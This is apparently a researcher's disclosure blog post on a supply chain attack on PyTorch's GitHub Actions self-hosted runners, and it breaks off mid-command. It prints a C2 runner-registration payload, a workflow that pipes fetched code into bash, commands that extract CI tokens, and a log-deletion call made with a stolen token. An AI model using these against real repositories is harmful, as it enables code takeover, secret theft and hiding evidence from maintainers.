January 11, 2024

Playing with Fire - How We Executed a Critical Supply Chain Attack on PyTorch

Security tends to lag behind adoption, and AI/ML is no exception. Four months ago, Adnan Khan and I exploited a critical CI/CD vulnerability in PyTorch, one of the world's leading ML platforms. Used by titans like Google, Meta, Boeing, and Lockheed Martin, PyTorch is a major target for hackers and nation-states alike. Thankfully, we exploited this vulnerability before the bad guys did. Here is how we did it.

Background

Before we dive in, let's scope things out and discuss why Adnan and I were looking at an ML repository. Let me give you a hint -- it was not to gawk at the neural networks. In fact, I don't know enough about neural networks to be qualified to gawk.

PyTorch was one of the first steps on a journey Adnan and I started six months ago, based on CI/CD research and exploit development we performed in the summer of 2023. Adnan started the bug bounty foray by leveraging these attacks to exploit a critical vulnerability in GitHub that allowed him to backdoor all of GitHub's and Azure's runner images, collecting a $20,000 reward. Following this attack, we teamed up to discover other vulnerable repositories. The results of our research surprised everyone, including ourselves, as we repeatedly executed supply chain compromises of leading ML platforms, billion-dollar blockchains, and more. In the seven days since we released our initial blog posts, they've caught on in the security world.

But you probably didn't come here to read about our journey; you came to read about the messy details of our attack on PyTorch. Let's begin.

Tell Me the Impact

Our exploit path resulted in the ability to upload malicious PyTorch releases to GitHub, upload releases to AWS, potentially add code to the main repository branch, backdoor PyTorch dependencies - the list goes on. In short, it was bad. Quite bad.

As we've seen before with SolarWinds, Ledger, and others, supply chain attacks like this are killer from an attacker's perspective. With this level of access, any respectable nation-state would have several paths to a PyTorch supply chain compromise.

GitHub Actions Primer

To understand our exploit, you need to understand GitHub Actions. Want to skip around? Go ahead.

1. Background
2. Tell Me the Impact
3. GitHub Actions Primer
   1. Self-Hosted Runners
4. Identifying the Vulnerability
   1. Identifying Self-Hosted Runners
   2. Determining Workflow Approval Requirements
   3. Searching for Impact
5. Executing the Attack
   1. Fixing a Typo
   2. Preparing the Payload
6. Post Exploitation
   1. The Great Secret Heist
      1. The Magical GITHUB_TOKEN
      2. Covering our Tracks
      3. Modifying Repository Releases
      4. Repository Secrets
      5. PAT Access
      6. AWS Access
7. Submission Details - No Bueno
   1. Timeline
8. Mitigations
9. Is PyTorch an Outlier?
10. References

If you've never worked with GitHub Actions or similar CI/CD platforms, I recommend reading up before continuing this blog post. Actually, if I lose you at any point, go and Google the technology that confused you. Typically, I like to start from the very basics in my articles, but explaining all the involved CI/CD processes would be a novel in itself.

In short, GitHub Actions allows the execution of code specified within workflow files as part of the CI/CD process. For example, let's say PyTorch wants to run a set of tests whenever a GitHub user submits a pull request. PyTorch can define these tests in a YAML workflow file used by GitHub Actions and configure the workflow to run on the pull_request trigger. Now, whenever a user submits a pull request, the tests will execute on a runner. This way, repository maintainers don't need to manually test everyone's code before merging.
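A minimal workflow along those lines might look like the sketch below; the file name, job, and test command are illustrative placeholders, not PyTorch's actual configuration.

    # .github/workflows/run-tests.yml (illustrative example)
    name: Run tests

    on:
      pull_request:                      # fires whenever a pull request is opened or updated
        branches: [main]

    jobs:
      test:
        runs-on: ubuntu-latest           # a GitHub-hosted runner
        steps:
          - uses: actions/checkout@v4    # check out the pull request's code
          - name: Run the test suite
            run: python -m pytest test/  # placeholder test command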
The public PyTorch repository uses GitHub Actions extensively for CI/CD. Actually, "extensively" is an understatement. PyTorch has over 70 different GitHub workflows and typically runs over ten workflows every hour. One of the most difficult parts of this operation was scrolling through all of the different workflows to select the ones we were interested in.

GitHub Actions workflows execute on two types of build runners. One type is GitHub-hosted runners, which GitHub maintains and hosts in its own environment. The other type is self-hosted runners.

Self-Hosted Runners

Self-hosted runners are build agents that run the Actions runner agent on end users' own infrastructure. In less technical terms, a "self-hosted runner" is a machine, VM, or container configured to run GitHub workflows from a GitHub organization or repository. Securing and protecting these runners is the responsibility of the end user, not GitHub, which is why GitHub recommends against using self-hosted runners on public repositories. Apparently, not everyone listens to GitHub, including GitHub.

It doesn't help that some of GitHub's default settings are less than secure. By default, when a self-hosted runner is attached to a repository, any of that repository's workflows can use that runner. This setting also applies to workflows from fork pull requests. Remember that anyone can submit a fork pull request to a public GitHub repository. Yes, even you.

The result of these settings is that, by default, any repository contributor can execute code on the self-hosted runner by submitting a malicious PR.

Note: A "contributor" to a GitHub repository is anyone who has added code to the repository. Typically, someone becomes a contributor by submitting a pull request that then gets merged into the default branch. More on this later.

If the self-hosted runner is configured using the default steps, it will be non-ephemeral. This means a malicious workflow can start a process in the background that continues to run after the job completes, and modifications to files (such as programs on the PATH) will persist past the current workflow. It also means that future workflows will run on that same runner.

Identifying the Vulnerability

Identifying Self-Hosted Runners

To identify self-hosted runners, we ran Gato, a GitHub attack and exploitation tool developed by Praetorian. Among other things, Gato can enumerate the existence of self-hosted runners within a repository by examining GitHub workflow files and run logs. Gato identified several persistent, self-hosted runners used by the PyTorch repository. We looked at repository workflow logs to confirm the Gato output.

[image-2] The name "worker-rocm-amd-30" indicates the runner is self-hosted.
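The same signal shows up in the workflow files themselves: a job is routed to self-hosted infrastructure through the labels in its runs-on field. Below is a stripped-down, hypothetical job definition of the kind that stands out during this sort of review; the labels and script path are illustrative, not copied from PyTorch.

    # Hypothetical job definition (not from PyTorch's workflows)
    jobs:
      rocm-tests:
        # the "self-hosted" label (plus any custom labels) sends this job to a user-managed machine
        runs-on: [self-hosted, linux.rocm.gpu]
        steps:
          - uses: actions/checkout@v4
          - name: Run the ROCm test shard
            run: .ci/run_tests.sh        # placeholder script path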
Determining Workflow Approval Requirements

Even though PyTorch used self-hosted runners, one major thing could still stop us. The default setting for workflow execution from fork PRs requires approval only for accounts that have not previously contributed to the repository. However, there is a stricter option that requires approval for all fork PR workflows, including those from previous contributors. We set out to discover which setting was in place.

Viewing the pull request (PR) history, we found several PRs from previous contributors that triggered pull_request workflows without requiring approval. This indicated that the repository did not require workflow approval for fork PRs from previous contributors. Bingo.

[image-12] Nobody had approved this fork PR workflow, yet the "Lint / quick-checks / linux-job" workflow ran on pull_request, indicating the default approval setting was likely in place.

Searching for Impact

Before executing these attacks, we like to identify GitHub secrets that we may be able to steal after landing on the runner. Workflow files revealed several GitHub secrets used by PyTorch, including but not limited to:

* "aws-pytorch-uploader-secret-access-key"
* "aws-access-key-id"
* "GH_PYTORCHBOT_TOKEN" (GitHub Personal Access Token)
* "UPDATEBOT_TOKEN" (GitHub Personal Access Token)
* "conda-pytorchbot-token"

We were psyched when we saw GH_PYTORCHBOT_TOKEN and UPDATEBOT_TOKEN. A PAT is one of your most valuable weapons if you want to launch a supply chain attack.

Using self-hosted runners to compromise GitHub secrets is not always possible. Much of our research has centered on self-hosted runner post-exploitation: figuring out methods to go from runner to secrets. PyTorch provided a great opportunity to test these techniques in the wild.

Executing the Attack

1. Fixing a Typo

We needed to be contributors to the PyTorch repository for our workflows to execute without approval, but we didn't feel like spending time adding features to PyTorch. Instead, we found a typo in a markdown file and submitted a fix. Another win for the Grammar Police.

[image-11] Yes, I'm re-using this meme from my last article, but it fits too well.

2. Preparing the Payload

Now we had to craft a workflow payload that would allow us to obtain persistence on the self-hosted runner. Red Teamers know that installing persistence in production environments typically isn't as trivial as a reverse Netcat shell. EDR, firewalls, packet inspection, and more can be in play, particularly in large corporate environments.

When we started these attacks, we asked ourselves the following question: what could we use for C2 that we knew would bypass EDR and whose traffic would not be blocked by any firewall? The answer is elegant and obvious: install another self-hosted GitHub runner and attach it to our private GitHub organization. Our "Runner on Runner" (RoR) technique uses the same servers for C2 as the existing runner, and the only binary we drop is the official GitHub runner agent, which is already running on the system. See ya, EDR and firewall protections.

We created a script to automate the runner registration process and included that as our malicious workflow payload. Storing the payload in a gist, we submitted a malicious draft PR.
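The registration flow that such a payload automates is essentially GitHub's own documented setup for a self-hosted runner. Here is a rough sketch, assuming a Linux x64 target; the organization URL, registration token, runner version, and paths are all placeholders, not our actual payload.

    # Sketch of a "Runner on Runner" registration payload (all values are placeholders).
    # It drops a second copy of the official runner agent, attaches it to an
    # attacker-controlled GitHub organization, and keeps it alive in the background.
    RUNNER_VERSION="2.311.0"
    mkdir -p /tmp/.runner2 && cd /tmp/.runner2
    curl -sL -o runner.tar.gz \
      "https://github.com/actions/runner/releases/download/v${RUNNER_VERSION}/actions-runner-linux-x64-${RUNNER_VERSION}.tar.gz"
    tar xzf runner.tar.gz
    # Register against the attacker's organization using a registration token generated there
    ./config.sh --unattended \
      --url https://github.com/attacker-org \
      --token "ATTACKER_REGISTRATION_TOKEN" \
      --name "$(hostname)-ror" \
      --labels ror
    # Run the agent in the background so it outlives the malicious workflow job
    nohup ./run.sh >/dev/null 2>&1 &

Because this is ordinary runner-agent traffic to GitHub, it blends in with what the box is already doing.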
The modified workflow looked something like this:

    name: " pre-commit"
    run-name: "Refactoring and cleanup"

    on:
      pull_request:
        branches: main

    jobs:
      build:
        name: Linux ARM64
        runs-on: ${{ matrix.os }}
        strategy:
          matrix:
            os: [
              {system: "ARM64", name: "Linux ARM64"},
              {system: "benchmark", name: "Linux Intel"},
              {system: "glue-notify", name: "Windows Intel"}
            ]
        steps:
          - name: Lint Code Base
            continue-on-error: true
            env:
              VERSION: ${{ matrix.version }}
              SYSTEM_NAME: ${{ matrix.os }}
            run: curl | bash

This workflow executes the RoR gist payload on three of PyTorch's self-hosted runners: a Linux ARM64 machine named "ARM64", an Intel device named "benchmark", and a Windows box named "glue-notify". Enabling draft status ensured that repository maintainers wouldn't receive a notification. However, given the complexity of PyTorch's CI/CD environment, I'd be surprised if they noticed either way.

We submitted the PR and installed our RoR C2 on each self-hosted runner.

[image-7] We used our C2 repository to execute the pwd && ls && /home && ip a command on the runner labeled "jenkins-worker-rocm-amd-34", confirming stable C2 and remote code execution. We also ran sudo -l to confirm we had root access.

Post Exploitation

We now had root on a self-hosted runner. So what? We had seen previous reports of gaining RCE on self-hosted runners, and they were often met with ambiguous responses due to their ambiguous impact. Given the complexity of these attacks, we wanted to demonstrate legitimate impact on PyTorch to convince them to take our report seriously. And we had some cool new post-exploitation techniques we'd been wanting to try.

The Great Secret Heist

In cloud and CI/CD environments, secrets are king. When we began our post-exploitation research, we focused on the secrets an attacker could steal and leverage in a typical self-hosted runner setup. Most of the secret stealing starts with the GITHUB_TOKEN.

The Magical GITHUB_TOKEN

Typically, a workflow needs to check out a GitHub repository to the runner's filesystem, whether to run tests defined in the repository, commit changes, or even publish releases. The workflow can use a GITHUB_TOKEN to authenticate to GitHub and perform these operations. GITHUB_TOKEN permissions can vary from read-only access to extensive write privileges over the repository. If a workflow executes on a self-hosted runner and uses a GITHUB_TOKEN, that token will be present on the runner for the duration of that build.

PyTorch had several workflows that used the actions/checkout step with a GITHUB_TOKEN that had write permissions. For example, by searching through workflow logs, we could see that the periodic.yml workflow also ran on the jenkins-worker-rocm-amd-34 self-hosted runner. The logs confirmed that this workflow used a GITHUB_TOKEN with extensive write permissions.

[image-3]

This token would only be valid for the life of that particular build. However, we developed some special techniques to extend the build length once you are on the runner (more on this in a future post). Due to the insane number of workflows that run daily from the PyTorch repository, we were not worried about tokens expiring, as we could always compromise another one.

When a workflow uses the actions/checkout step, the GITHUB_TOKEN is stored in the .git/config file of the checked-out repository on the self-hosted runner during an active workflow. Since we controlled the runner, all we had to do was wait until a non-PR workflow with a privileged GITHUB_TOKEN ran on the runner and then print out the contents of that config file.
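Concretely, actions/checkout (with its default persist-credentials behavior) writes the token into the local git config as a base64-encoded basic-auth header. A minimal sketch of how someone already on the runner could recover it; the workspace path is a placeholder:

    # Read the credential that actions/checkout persisted in the checked-out repo
    cd /path/to/actions-runner/_work/repo/repo   # placeholder checkout path on the runner
    git config --local --get "http.https://github.com/.extraheader"
    # -> AUTHORIZATION: basic <base64 blob>
    git config --local --get "http.https://github.com/.extraheader" \
      | sed 's/^AUTHORIZATION: basic //' | base64 -d
    # -> x-access-token:ghs_...   (the ghs_ value is the workflow's GITHUB_TOKEN)

From there, the token works as a normal bearer token against the GitHub API until the job ends.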
[image-6] We used our RoR C2 to steal the GITHUB_TOKEN of an ongoing workflow with write permissions.

Covering our Tracks

Our first use of the GITHUB_TOKEN was to eliminate the run logs from our malicious pull request. We wanted a full day to perform post-exploitation, and we didn't want our activity to raise any alarms. We used the GitHub API along with the token to delete the run logs for each of the workflows our PR triggered. Stealth mode = activated.

    curl -L \
      -X DELETE \
      -H "Accept: application/vnd.github+json" \
      -H "Authorization: Bearer $STOLEN_TOKEN" \
      -H "X-GitHub-Api-Version: 2022-11-28" \